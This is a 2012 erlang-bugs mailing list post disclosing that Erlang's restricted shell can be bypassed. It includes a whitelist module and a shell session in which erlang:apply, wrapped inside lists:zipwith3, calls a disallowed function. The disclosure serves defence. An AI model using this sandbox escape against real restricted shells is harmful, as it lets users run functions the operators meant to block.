[erlang-bugs] The Erlang Restricted Shell allows execution of random commands
Roberto Aloi
roberto.aloi@REDACTED
Tue Jan 31 12:46:24 CET 2012
Hi all,
reading from the Erlang doc:
http://www.erlang.org/doc/man/shell.html#start_restricted-1
"The shell may be started in a restricted mode. In this mode, the shell evaluates a function call only if allowed."
Let's write a minimal module which whitelists the 'lists' module only:
=====
-module(restrict).
-export([local_allowed/3, non_local_allowed/3]).
-define(NON_LOCAL_ALLOWED, [lists]).
local_allowed(_Cmd, _Args, State) ->
{false, State}.
non_local_allowed({Module, _Function}, _Args, State) ->
{lists:member(Module, ?NON_LOCAL_ALLOWED), State}.
=====
Let's then start a restricted shell, using the above module.
$ erlc restrict.erl
$ erl -stdlib restricted_shell restrict
Erlang R14B04 (erts-5.8.5) [source] [64-bit] [smp:4:4] [rq:4] [async-threads:0] [hipe] [kernel-poll:false]
Restricted Eshell V5.8.5 (abort with ^G)
And let's see if it works as expected.
1> erlang:time().
** exception exit: restricted shell does not allow time()
Cool.
2> erlang:apply(erlang, time, []).
** exception exit: restricted shell does not allow time()
Yeah.
3> F = fun (M,F,A) -> lists:zipwith3({erlang, apply}, [M], [F], [ A ]) end.
#Fun<erl_eval.18.59269574>
4> F(erlang, time, []).
[{12,35,45}]
Ooops.
Please notice that I'm not the one who actually discovered this bug (or is it a feature?). It was actually one of the tryerlang.org users, who kindly informed me about this. Originally I thought this was an application bug, but it is not. This is more generic and it affects the restricted shell itself.
Best regards,
Roberto Aloi
---
@robertoaloi
Erlang Solutions Ltd.
www.erlang-solutions.com
More information about the erlang-bugs
mailing list